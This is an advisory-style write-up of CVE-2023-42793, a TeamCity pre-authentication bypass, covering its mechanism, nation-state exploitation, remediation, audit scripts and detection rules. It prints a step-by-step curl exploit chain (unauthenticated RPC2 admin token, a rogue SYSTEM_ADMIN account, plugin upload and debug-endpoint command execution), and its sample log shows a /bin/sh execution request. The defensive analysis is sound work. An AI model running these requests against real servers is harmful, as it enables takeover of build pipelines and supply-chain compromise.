
CVE-2023-42793: JetBrains TeamCity — Pre-Auth Authentication Bypass

CVE Details

CVE ID: CVE-2023-42793
CVSS Score: 9.8
Severity: Critical
Vendor: JetBrains
Product: TeamCity
Patch Status: Available
Published: March 17, 2026

Background

JetBrains TeamCity is a widely deployed CI/CD (continuous integration/continuous deployment) server, critical to software development pipelines at organisations ranging from independent software vendors to large enterprises and government contractors. TeamCity controls build, test and deployment automation, so a compromise lets an attacker modify software artifacts, steal source code and credentials, and potentially insert malicious code into products distributed to customers.

CVE-2023-42793 is a critical pre-authentication bypass in TeamCity Server, disclosed in September 2023. Any unauthenticated attacker with HTTP access to a TeamCity server can obtain an administrator-level access token without credentials, and from there full control of the server. The vulnerability saw aggressive exploitation by multiple nation-state actors, most prominently Russia's SVR (APT29 / Cozy Bear) and the North Korean groups tracked by Microsoft as Diamond Sleet and Onyx Sleet, with CISA, the FBI and international partners issuing advisories.

Technical Mechanism

CVE-2023-42793 is an authentication bypass in TeamCity Server's request handling. TeamCity authenticates HTTP requests in an interceptor chain that runs in front of its Spring controllers, not inside the controllers themselves. That chain keeps a list of URL patterns that are exempt from pre-handling, and therefore from authentication, for endpoints that authenticate on their own. One of those patterns is a wildcard for the legacy XML-RPC endpoint (/**/RPC2), which matches any path whose last segment is RPC2.

The bypass exploits the mismatch between that exemption and the actual routing: the exemption is decided on the request path alone, so any URL ending in /RPC2 skips authentication whatever controller it is routed to. The REST API's token endpoint reads the last path segment as the name of the token to create, so a request to /app/rest/users/id:1/tokens/RPC2 both satisfies the exemption and is a valid REST call: create an access token named RPC2 for user id 1, the first account created on install and normally the server administrator. No path-parameter tricks are involved; the semicolon (;.jsp) technique sometimes described alongside this bug belongs to a different TeamCity authentication bypass (CVE-2024-27198, fixed in 2023.11.4).

# Normally restricted endpoint (creates an access token for user id 1;
# the last path segment is the token name):
POST /app/rest/users/id:1/tokens/<name>

# Bypass: the path ends in /RPC2, so the authentication interceptor is skipped,
# and the REST controller treats "RPC2" as the name of the token to create:
POST /app/rest/users/id:1/tokens/RPC2
# The response body carries the value of the new token.
# Creation fails if a token named RPC2 already exists, so public exploits first
# send DELETE /app/rest/users/id:1/tokens/RPC2, which is exempt for the same reason.
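The bug class is easier to see in a few lines of code. The following is an added example, not TeamCity's source: it models an authentication interceptor that consults a list of Ant-style URL patterns exempt from authentication, and a REST controller that names the token after the last path segment. The pattern syntax, the function names and the "hardened" exemption list are assumptions made for the illustration (JetBrains' actual patch may differ).

```python
import re

# Added example modelling the CVE-2023-42793 bug class; not TeamCity's code.
# Ant-style patterns: '/**/' matches zero or more whole path segments,
# '*' matches within one segment (assumption made for this illustration).

def ant_to_regex(pattern: str) -> re.Pattern:
    """Translate an Ant-style path pattern into an anchored regular expression."""
    out, i = [], 0
    while i < len(pattern):
        if pattern.startswith("/**/", i):
            out.append("/(?:.*/)?")
            i += 4
        elif pattern.startswith("**", i):
            out.append(".*")
            i += 2
        elif pattern[i] == "*":
            out.append("[^/]*")
            i += 1
        else:
            out.append(re.escape(pattern[i]))
            i += 1
    return re.compile("^" + "".join(out) + "$")

# Vulnerable: the wildcard was meant for the XML-RPC endpoint, but it matches any
# path whose last segment is RPC2, including REST API paths.
VULNERABLE_EXEMPTIONS = ["/**/RPC2"]
# Hardened (assumed fix for the illustration): exempt only the exact endpoint.
HARDENED_EXEMPTIONS = ["/RPC2"]

def requires_auth(path: str, exemptions) -> bool:
    """The interceptor decides on the path alone; the query string is ignored."""
    path = path.split("?", 1)[0]
    return not any(ant_to_regex(p).match(path) for p in exemptions)

# REST route: the last segment is the name of the token to create (hypothetical regex).
TOKEN_ROUTE = re.compile(r"^/app/rest/users/id:(\d+)/tokens/([^/]+)$")

def handle(method: str, path: str, authenticated: bool, exemptions) -> dict:
    """Emulate interceptor chain plus routing; returns the status and any side effect."""
    if requires_auth(path, exemptions) and not authenticated:
        return {"status": 401}
    m = TOKEN_ROUTE.match(path.split("?", 1)[0])
    if m and method == "POST":
        # The controller, having been reached, assumes the caller was authenticated.
        return {"status": 200,
                "token_created": {"user": int(m.group(1)), "name": m.group(2)}}
    if path == "/RPC2":
        return {"status": 200}  # XML-RPC handler authenticates its own payload
    return {"status": 404}

if __name__ == "__main__":
    attacker = ("POST", "/app/rest/users/id:1/tokens/RPC2", False)
    print("vulnerable:", handle(*attacker, VULNERABLE_EXEMPTIONS))
    print("hardened:  ", handle(*attacker, HARDENED_EXEMPTIONS))
```

The lesson generalises beyond TeamCity: an authentication exemption expressed as a suffix wildcard is only as safe as the set of routes that can end in that suffix, and any route that interprets a free-form trailing segment (a token name, a file name, an ID) turns the exemption into a bypass.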

With an administrator token in hand, full control of TeamCity follows:

# Step 1: Obtain an admin token via the bypass (no Authorization header needed)
curl -X DELETE "https://teamcity.target.com/app/rest/users/id:1/tokens/RPC2"
curl -X POST "https://teamcity.target.com/app/rest/users/id:1/tokens/RPC2" \
  -H "Accept: application/json"
# Response (JSON): {"name":"RPC2","value":"<token>", ...}

# Step 2: Use the token to create a new system administrator
curl -X POST "https://teamcity.target.com/app/rest/users" \
  -H "Authorization: Bearer <token>" \
  -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"P@ss!","roles":{"role":[{"roleId":"SYSTEM_ADMIN","scope":"g"}]}}'

# Step 3: Code execution on the server, e.g. by uploading a malicious plugin
curl -X POST "https://teamcity.target.com/admin/pluginUpload.html" \
  -H "Authorization: Bearer <token>" \
  -F "file=@malicious.zip"
# Public exploits instead enabled the REST debug endpoint by writing
# rest.debug.processes.enable=true to <data dir>/config/internal.properties
# (via /admin/dataDir.html) and then ran commands through /app/rest/debug/processes.

Real-World Exploitation Evidence

CVE-2023-42793 was the subject of joint advisory AA23-347A from CISA, the FBI, the NSA and international partners (Poland's SKW and CERT Polska, the UK's NCSC), published in December 2023 and specifically addressing state-sponsored exploitation:

APT29 (Russian SVR / Cozy Bear; Microsoft's Midnight Blizzard):

  • The advisory documents the SVR exploiting CVE-2023-42793 since September 2023, with particular interest in software development companies, IT service providers, and other organisations with significant software production capability.
  • The methodology echoes the 2020 SolarWinds supply chain attack: compromising build infrastructure positions the actor to poison software distributed to downstream customers.
  • Post-exploitation activity included host reconnaissance, deploying backdoors on the compromised servers, stealing source code, and harvesting credentials stored in TeamCity.

Diamond Sleet and Onyx Sleet (North Korean clusters tracked by Microsoft, both associated with the Lazarus Group):

  • Two distinct North Korean threat actor clusters were documented exploiting CVE-2023-42793 from October 2023. Their goals appeared to include credential harvesting, cryptocurrency theft, and espionage.
  • Microsoft documented custom post-exploitation tooling, including the ForestTiger backdoor and the HazyLoad proxy tool.

Widespread opportunistic exploitation by criminal actors was also documented, with ransomware groups and initial access brokers also weaponising the vulnerability.

Impact Assessment

Supply chain implications of TeamCity compromise:

  • Build pipeline poisoning: Attackers can modify build configurations to include malicious steps that inject code into compiled software artifacts.
  • Artifact signing: If the build server has access to code signing certificates, compromised artifacts can be signed with legitimate certificates.
  • Source code theft: TeamCity has read access to all connected VCS (version control) repositories.
  • Credential harvesting: Build pipelines store credentials for cloud providers, package registries (NPM, PyPI, NuGet), deployment targets, and databases.
  • Downstream customer impact: Organisations using software built on a compromised TeamCity server may unknowingly receive malicious updates.

Affected Versions

Product                 Affected Versions                  Fixed Version
TeamCity On-Premises    All versions before 2023.05.4      2023.05.4
TeamCity Cloud          Patched automatically              N/A

Remediation Steps

  1. Upgrade to TeamCity 2023.05.4 or later. This is the primary remediation.

  2. Apply the security patch plugin if an immediate upgrade is not possible:

    • JetBrains released a standalone security patch plugin for this vulnerability covering older release lines
    • Install it via the TeamCity admin UI under Administration > Plugins

  3. Audit administrator accounts and tokens. Immediately after patching, review all accounts holding the SYSTEM_ADMIN role, and the access tokens of the first administrator (user id 1, under Administration > Users or via GET /app/rest/users/id:1/tokens): a token named RPC2 that you did not create is the fingerprint of this exploit.

    # Via the TeamCity REST API
    curl "https://teamcity.example.com/app/rest/users?locator=role:SYSTEM_ADMIN" \
      -H "Authorization: Bearer <token>"

  4. Review installed plugins. Check for plugins installed by unauthorised users:

    • Administration > Plugins: review all installed plugins and their installation dates

  5. Review build configuration changes. Check VCS history and the TeamCity audit log for modifications to build configurations, and check <data dir>/config/internal.properties for rest.debug.processes.enable=true, which public exploits wrote there to obtain command execution.

  6. Rotate all credentials. Change every credential stored in TeamCity parameters, connection profiles and environment variables, and any signing key the build agents could reach. Where exploitation is confirmed, rebuild the server from a known-good backup rather than cleaning it in place.
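The audit in steps 3 and 5 can be scripted against the REST API's JSON responses and the data directory. The following is an added example, not TeamCity's or JetBrains' code: the two JSON documents are constructed samples in the shape the REST API returns for GET /app/rest/users/id:1/tokens and GET /app/rest/users (field names assumed from the API documentation), the properties file is a constructed sample, and the expected-admin list is an assumption you would replace with your own change records.

```python
import json
import re

# Added example for the post-patch audit; not TeamCity's code.
# Constructed sample of GET /app/rest/users/id:1/tokens (shape assumed).
SAMPLE_TOKENS_JSON = json.dumps({"count": 2, "token": [
    {"name": "release-bot", "creationTime": "20230801T101500+0000"},
    {"name": "RPC2", "creationTime": "20230928T031204+0000"},
]})

# Constructed sample of GET /app/rest/users?fields=user(id,username,roles(role(roleId,scope)))
SAMPLE_USERS_JSON = json.dumps({"count": 3, "user": [
    {"id": 1, "username": "admin",
     "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}},
    {"id": 7, "username": "builder",
     "roles": {"role": [{"roleId": "PROJECT_DEVELOPER", "scope": "p:Shop"}]}},
    {"id": 42, "username": "attacker",
     "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}},
]})

# Constructed sample of <data dir>/config/internal.properties after exploitation.
SAMPLE_INTERNAL_PROPERTIES = """\
teamcity.installation.completed=true
rest.debug.processes.enable=true
"""

# Accounts that your own records say should hold SYSTEM_ADMIN (assumption).
EXPECTED_ADMINS = {"admin"}

def exploit_tokens(tokens_json: str) -> list:
    """Tokens named RPC2 on the audited user: the name this bypass forces."""
    doc = json.loads(tokens_json)
    return [t for t in doc.get("token", []) if t.get("name") == "RPC2"]

def unexpected_admins(users_json: str, expected: set) -> list:
    """Usernames holding a global (scope 'g') SYSTEM_ADMIN role not on the expected list."""
    doc = json.loads(users_json)
    found = []
    for user in doc.get("user", []):
        roles = user.get("roles", {}).get("role", [])
        is_global_admin = any(r.get("roleId") == "SYSTEM_ADMIN" and r.get("scope") == "g"
                              for r in roles)
        if is_global_admin and user["username"] not in expected:
            found.append(user["username"])
    return found

_DEBUG_FLAG = re.compile(r"^\s*rest\.debug\.processes\.enable\s*=\s*true\s*$",
                         re.IGNORECASE | re.MULTILINE)

def debug_endpoint_enabled(internal_properties: str) -> bool:
    """True if the REST debug endpoint used by public exploits for RCE was switched on."""
    return _DEBUG_FLAG.search(internal_properties) is not None

def audit(tokens_json: str, users_json: str, internal_properties: str,
          expected_admins: set) -> dict:
    """Combine the three checks into one verdict; any hit means treat the server as compromised."""
    findings = {
        "exploit_tokens": [t["name"] for t in exploit_tokens(tokens_json)],
        "unexpected_admins": unexpected_admins(users_json, expected_admins),
        "debug_endpoint_enabled": debug_endpoint_enabled(internal_properties),
    }
    findings["compromise_likely"] = bool(findings["exploit_tokens"]
                                         or findings["unexpected_admins"]
                                         or findings["debug_endpoint_enabled"])
    return findings

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_TOKENS_JSON, SAMPLE_USERS_JSON,
                           SAMPLE_INTERNAL_PROPERTIES, EXPECTED_ADMINS), indent=2))
```

Against a live server you would feed the two functions the bodies of the authenticated REST calls and read internal.properties from the data directory; a clean result only means these three indicators are absent, so it complements, rather than replaces, the plugin, build-configuration and VCS review.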

Detection Guidance

Log sources:

  • TeamCity server log: <TeamCity data dir>/logs/teamcity-server.log
  • Access log of the bundled Tomcat: <TeamCity install>/logs/localhost_access_log.*.txt
  • TeamCity audit log: Administration > Audit Log (new users, role grants and other administrative changes)
  • Access tokens of the first administrator (Administration > Users, or GET /app/rest/users/id:1/tokens): a token named RPC2 that nobody created
  • <TeamCity data dir>/config/internal.properties containing rest.debug.processes.enable=true

Suspicious access patterns (the bypass needs no path parameters; the distinctive element is a REST token path ending in /RPC2):

POST   /app/rest/users/.*/tokens/RPC2      (token creation via the bypass)
DELETE /app/rest/users/.*/tokens/RPC2      (clearing a previous token; public exploits send this first)
POST   /admin/dataDir.html?action=edit&fileName=config/internal.properties.*   (enabling the debug endpoint)
POST   /app/rest/debug/processes           (command execution through the debug endpoint)
POST   /admin/pluginUpload.html            (unexpected plugin upload)

A 200 response to the token-creation POST is the strongest single indicator. The Tomcat access log does not record the Authorization header, so confirm against the administrator's token list rather than assuming the request was unauthenticated.

Suricata signature (sticky-buffer syntax, Suricata 5 or later):

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"JetBrains TeamCity CVE-2023-42793 Auth Bypass - REST token path ending in RPC2"; flow:established,to_server; http.uri; content:"/app/rest/users/"; content:"/tokens/RPC2"; distance:0; classtype:web-application-attack; sid:9002342; rev:2;)
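The same patterns as detection logic over the Tomcat access log, as an added example that is not part of the original advisory or of TeamCity: it parses lines in Tomcat's common log format, applies one rule per stage of the exploit chain, and separates the attempt (any request to the bypass path) from the confirmed case (a 200 to the POST). The log lines are constructed samples with invented addresses and timestamps.

```python
import re

# Added example: detection over constructed Tomcat access-log lines, not part of
# the original advisory. Addresses, timestamps and sizes are invented.
SAMPLE_ACCESS_LOG = """\
10.1.2.3 - - [28/Sep/2023:03:12:01 +0000] "GET /login.html HTTP/1.1" 200 4133
203.0.113.9 - - [28/Sep/2023:03:12:03 +0000] "DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 404 87
203.0.113.9 - - [28/Sep/2023:03:12:04 +0000] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 512
203.0.113.9 - - [28/Sep/2023:03:12:09 +0000] "POST /admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable%3Dtrue HTTP/1.1" 200 0
203.0.113.9 - - [28/Sep/2023:03:12:15 +0000] "POST /app/rest/debug/processes?exePath=/bin/sh&params=-c&params=id HTTP/1.1" 200 201
10.1.2.3 - - [28/Sep/2023:03:15:40 +0000] "POST /app/rest/users/id:12/tokens/my-laptop HTTP/1.1" 200 498
10.1.2.3 - - [28/Sep/2023:03:16:02 +0000] "GET /app/rest/server HTTP/1.1" 200 1720
"""

# Tomcat common log format: host ident user [time] "method target protocol" status bytes
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Each rule: (label, accepted methods, regex over the path, regex over the query or None)
RULES = [
    ("cve-2023-42793 token bypass", {"POST", "DELETE"},
     re.compile(r"^/app/rest/users/[^/]+/tokens/RPC2$"), None),
    ("debug endpoint enabled", {"POST", "GET"},
     re.compile(r"^/admin/dataDir\.html$"),
     re.compile(r"action=edit.*internal\.properties|rest\.debug\.processes\.enable")),
    ("command execution via debug API", {"POST"},
     re.compile(r"^/app/rest/debug/processes$"), None),
    ("plugin upload", {"POST"},
     re.compile(r"^/admin/pluginUpload\.html$"), None),
]

def parse(line: str):
    """Split one access-log line into fields; None for lines that do not parse."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec.pop("target").partition("?")
    rec["status"] = int(rec["status"])
    return rec

def detect(log_text: str) -> list:
    """Return (src, time, label, method, path, status) for every request matching a rule."""
    hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec:
            continue
        for label, methods, path_re, query_re in RULES:
            if (rec["method"] in methods and path_re.match(rec["path"])
                    and (query_re is None or query_re.search(rec["query"]))):
                hits.append((rec["src"], rec["time"], label,
                             rec["method"], rec["path"], rec["status"]))
    return hits

def confirmed_bypass_sources(log_text: str) -> set:
    """Sources whose token-creation POST returned 200, i.e. a token was issued.
    The access log carries no Authorization header, so pair this with the
    administrator's token list before calling it a confirmed compromise."""
    return {h[0] for h in detect(log_text)
            if h[2] == "cve-2023-42793 token bypass" and h[3] == "POST" and h[5] == 200}

if __name__ == "__main__":
    for hit in detect(SAMPLE_ACCESS_LOG):
        print(hit)
    print("confirmed:", confirmed_bypass_sources(SAMPLE_ACCESS_LOG))
```

The first rule anchors on the exact path rather than on any URL containing RPC2, which keeps ordinary token names (my-laptop above) out of the results; the dataDir rule is the one most worth tuning, since legitimate administrators also edit internal.properties through that page.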

Timeline

Date                 Event
September 18, 2023   JetBrains releases TeamCity 2023.05.4 with the fix; its advisory and the security patch plugin follow within days
Late September 2023  Sonar, which reported the bug, publishes details; Rapid7 publishes an analysis and a Metasploit module; in-the-wild exploitation is observed within days
October 4, 2023      CISA adds CVE-2023-42793 to the KEV catalogue
October 18, 2023     Microsoft reports Diamond Sleet and Onyx Sleet exploiting the vulnerability
December 13, 2023    CISA, FBI, NSA, SKW, CERT Polska and NCSC publish joint advisory AA23-347A on SVR (APT29) exploitation
2024                 Continued attribution and victim identification